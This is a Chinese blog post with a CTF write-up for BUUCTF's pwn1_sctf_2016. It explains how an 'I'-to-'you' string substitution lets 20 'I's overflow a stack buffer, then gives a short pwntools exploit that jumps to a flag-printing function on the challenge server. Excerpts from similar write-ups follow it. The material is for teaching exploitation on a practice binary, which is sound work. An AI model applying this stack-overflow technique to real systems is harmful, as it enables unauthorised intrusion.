pwn1_sctf_20161

最新推荐文章于 2024-10-13 11:33:23 发布
最新推荐文章于 2024-10-13 11:33:23 发布
阅读量292 收藏
点赞数 1
文章标签: 网络安全 python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74091653/article/details/133265753
版权

查看保护

找到关键函数

发现fgetsg函数  溢出0x3c

fgets() 函数从指定的文件流 stream 中读取字符,并将其存储在 str 指向的字符数组中,直到遇到换行符 \n 或达到最大字符数 n-1,或者遇到文件尾。fgets() 函数相对安全,因为它可以限制读取的字符数,防止缓冲区溢出

这里我们正常溢出是不行的

但是可以发现会将输入的 I 换成 you 

也就是我们可以用20个 I 来溢出

也找出了cat flag.txt

构造EXp

from pwn import *
sh=remote('node4.buuoj.cn',28007)
payload =0x8048f13
sh.sendline('I'*20+'AAAA' + p32(payload))
sh.interactive()

C -yi
关注
日行一pwn:pwn1_sctf_2016
m0_57221101的博客
05-13 625
用俩图床,有的有水印,有的没水印,折磨 距离上一次日行一pwn已经快一个月了,干脆改成月行一pwn吧(汗。这段时间去恶补了王爽老师的汇编语言。 结果一回来就做了这么一道题,函数封装的严严实实,打眼一看全是C++。想入门pwn这么难吗。 正片 BUUCTF在线评测 使用BUUCTF靶场,首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编 发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码,也就是我们之前在BOF中学习的像内存中写入Shell的方法
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1023
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF pwn1_sctf_2016 1
qq_56313338的博客
10-14 204
查看文件信息然后进行反汇编关键信息说实话,这个应该是C++编写的程序,C++基础还是不行,我硬是没看懂这个代码我查了一下字符串这里的get_flag是函数,另一个应该就是执行的一个命令了到IDA中查找TAB切换到汇编,再空格先给他地址记下08048F0D这里网上说是把I换成you导致了溢出,输入I就多出了2个字符,s的空间为32字节,足够我们溢出8字节了。
pwn-5-pwn1_sctf_20161
最新发布
zhi741的博客
10-13 329
拿到这道题我们先checksec,注意观察这个位置: PIE: No PIE (0x8048000)这句话告诉我们的是“当前的可执行文件不是一个位置无关的可执行文件,而是被加载到了一个固定的内存地址0x8048000” 目前我们就只需要知道这是一个固定的地址。但是不会无缘无故出现参数,v3还没有内容无法到达栈溢出点我们将其补齐就有了 20+4=24,虽然看着是24个字节但不能像我们之前那种写法,里面有I变you 由1字节变成3字节,剩下的4个字节我们可以字节任意编写。
BUUCTF pwn1_sctf_2016
CHAWUCIREN1的博客
04-08 3454
执行一下 似乎出现第一个i被替换成you 检查一下保护机制 丢到ida里面 输入的变量s大小为0x3c,但是我们看fgets里面,我们只能输入32个字符,没法进行溢出, 我们在输入的时候,会发现i会被替换成you,所以我们可以利用20个i来填充, 找到shell,地址为0x8048F0D 返回地址再随便填四个字符 我们可以构造一下payload payload = ‘I’*20 + p64(0x8048F0D) 这里特别注意一下 payload可以有多种写法 ‘I’ *19 + ‘A’*7 + p
pwn1_sctf_2016
qq_41696518的博客
07-13 266
pwn1_sctf_2016
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2540
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换
serfend's blog
04-14 518
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码:mpgo 答案:flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路 发现get_flag的位置 发现输入会被替换,构造exp 详细步骤 查看文件信息 查看题目发现是将用户输入的I替换为you,虽然输入的时候只允许输入32位,但是因为替换
pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0
LSYZWF的博客
10-26 624
文章目录ciscn_2019_n_1题目解答 ciscn_2019_n_1 题目 题目链接:https://buuoj.cn/challenges#ciscn_2019_n_1 解答 1、打开IDA进行分析 发现函数gets和系统命令cat 此函数的大致意思是输入v1的值,然后判断v2,故存在栈溢出使得v2的内存中的值为11.28125 2、判断偏移地址 v2的内存地址距离v1首地址的偏移量是30h-04h=2ch 3、gdb调试一波 没有堆栈溢出保护 4、编写脚本 11.28125的十六进制可以在I
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1343
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
PWN (3) pwn1_sctf_2016 1
brightendavid的博客
05-11 497
查找字符串,发现了一个flag.txt。 输入在这里 限制为32长度的输入
BUUCTF刷题之路-pwn1_sctf_20161
qq_30528603的博客
05-27 521
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
buuctf pwn1_sctf_20161
m0_74125780的博客
08-26 152
然后又发现有个fgets函数,但是它限制只有32个字节,双击s查看s的长度,0x3c,有60个字符长度,但是只能输入32个字符所以无法造成栈溢出。但观察函数的内容,并nc一下,发现I可以替换成you。所以输入20个I就刚好满足60长度,再加上4。首先用checksec检查,发现是32位的,所以用32位的ida打开。速度找到system函数,查看它的地址,记下来,0x8048F0D。最后编写脚本,运行得到flag。
buuctf之pwn1_sctf_2016
weixin_54452942的博客
03-27 730
简单易懂~
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值